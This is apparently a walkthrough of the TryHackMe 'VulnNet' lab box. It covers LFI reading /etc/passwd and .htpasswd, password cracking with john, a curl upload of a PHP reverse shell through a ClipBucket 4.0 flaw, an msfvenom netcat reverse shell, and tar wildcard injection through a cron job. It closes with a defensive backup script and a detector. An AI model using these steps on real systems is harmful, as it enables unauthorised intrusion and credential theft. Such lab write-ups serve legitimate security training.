This is the oldest of the VulnNet boxes on TryHackMe. It is also rated as a medium difficulty box.
If you have never used AutoRecon before and would like some explanation, check out this post: Using AutoRecon
VulnNet Home Page:
- Looking through the nmap scans we find a domain name: vulnnet.thm
This means we should update our /etc/hosts file on our local attack machine with a line that looks like:
<xx.xx.xx.xx> vulnnet.thm
Replace the xx.xx.xx.xx with the IP the VulnNet machine is assigned.
- If we look at the dirbuster/feroxbuster results we find 2 .js files.
Let’s examine these files for more clues.
In one file we find a reference to:
http://vulnnet.thm/index.php?referer=
If we try
http://vulnnet.thm/index.php?referer=/etc/passwd
the page just looks like normal, but if we view source on the page that is returned:
Looks like we have two ‘real’ users:
root:x:0:0:root:/root:/bin/bash
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
In the other .js file we find a reference to a subdomain: broadcast.vulnnet.thm
We should go back and add that to our line in /etc/hosts for VulnNet:
<xx.xx.xx.xx> vulnnet.thm broadcast.vulnnet.thm
Replace the xx.xx.xx.xx with the IP the VulnNet machine is assigned.
When we go to the site we see that it directs us to log in. Using Burp we verify it is “basic auth”.
OK, so now let’s go back to our LFI (Local File Inclusion) and check for
Now let’s see if we can view the .htpasswd file. We were able to retrieve a user hash. Let’s crack it with john.
So here is the command I used:
john --pot=cracked.pot --wordlist=/usr/share/wordlists/rockyou.txt hash
- I use the --pot option so john saves any cracked passwords in that file, so I don’t forget to save them myself!
- --wordlist is the location of the wordlist you wish to use. Your rockyou.txt might live in a different place than mine.
- hash is just the name of the file I saved the hash we found in.
And now we log in to ClipBucket… whatever that is.
Let’s see if we can find out what version it is.
Let’s view the page source: And there it is: ClipBucket version 4.0
Let’s check searchsploit:
We can copy the exploit to our current location using the -m (mirror) flag:
searchsploit -m php/webapps/44250.txt
Reading through the exploit 44250.txt, it seems to imply that there is a /actions directory on the ClipBucket app. Let’s check it out….
So it looks like if we use this command:
sudo curl -F "email@example.com" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<PASSWORD>
We should be able to upload a reverse shell.
DON’T forget to set up your listener! :)
After the file is uploaded, check the actions directory and there is a new folder: CB_BEATS_UPLOAD_DIR. The rev shell file will be in there.
First upgrade the shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
Then run this to make sure your PATH and some other things are set up correctly in your shell:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp;export TERM=xterm-256color;alias ll='ls -lah --color=auto'
And I created a little one-liner to get some quick info on the system:
echo '----------';which gcc;which cc;which python;which python3;which perl;echo '';which wget;which curl;which nc;echo '';whoami;id;echo '';file /bin/bash;echo '';uname -a;cat /etc/issue;cat /etc/*-release;echo '-----------'
Which gets you this:
Next I will use wget to copy the lse.sh script over to look for privesc options. Here is the github repo for LSE
We discover this file running LSE:
[!] fst190 Can we read any backup?......................................... yes!
---
-rw-rw-r-- 1 server-management server-management 1484 Jan 24 2021 /var/backups/ssh-backup.tar.gz
I wasn’t able to extract the tar file on the machine, so since we have python3 I fired up a python3 http server to copy the file over:
python3 -m http.server 8000
Extracting the backup file gives us an id_rsa file. But it is password protected.
ssh2john id_rsa > id_rsa.hash
and then use john to crack the newly created hash.
DON’T forget to
chmod 400 id_rsa
Now we can log in through ssh with the id_rsa key.
From this account, running LSE reveals a cron running a file we have write access to. The script the cron runs is /var/opt/backupsrv.sh. Examining that file reveals that it is making a backup of all the files in /home/server-management/Documents using the “*” wildcard.
You can read about how we can use this at gtfobins. BTW, that site should be on your speed dial!
There is also a great article about exploiting the wildcard HERE
On your local machine, run this to get your reverse shell:
msfvenom -p cmd/unix/reverse_netcat lhost=<local-ip> lport=<desired-port> R
Start your listener!
On the target machine navigate to the Documents directory the backup script reads and run:
echo "YOUR REVERSE SHELL FROM MSFVENOM HERE" > shell.sh
chmod +x shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
And then wait for the cron to run. Your shell should pop up.
Go get that root flag!
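The wildcard problem in the backup script above, seen from the defender’s side: this is an added example (not the box’s own /var/opt/backupsrv.sh) with a backup routine that cannot be hijacked by file names in the source directory, and a check that flags the names such an attempt leaves behind. The function names and paths are my own assumptions.

```shell
#!/bin/sh
# Added example, not the box's own /var/opt/backupsrv.sh. It shows the
# hardened form of a cron backup (file names can never reach tar's option
# parser) and a check a defender can run for the leftovers of a wildcard
# injection attempt. Directory and archive paths are whatever the caller passes.

# Hardened backup: tar is told to change into the source directory and to
# archive "." as its only member argument. Nothing from the directory
# listing is ever placed on tar's command line. A bare "*" does the
# opposite: the shell expands it, and any entry starting with "-" is then
# parsed by tar as an option such as --checkpoint-action=exec=...
safe_backup() {
    src="$1"
    out="$2"
    tar -czf "$out" -C "$src" .
}

# Detection: print entries directly inside a backed-up directory whose
# names begin with "-". Real documents almost never start with a dash, so
# names like "--checkpoint=1" are a strong indicator of tampering.
find_option_like_names() {
    dir="$1"
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# Wrapper for the cron job: refuse to run and exit non-zero when suspicious
# names are present, so the operator is alerted instead of the script
# silently archiving (or, with "*", executing) them.
checked_backup() {
    if [ -n "$(find_option_like_names "$1")" ]; then
        echo "suspicious file names in $1, backup skipped" >&2
        return 1
    fi
    safe_backup "$1" "$2"
}
```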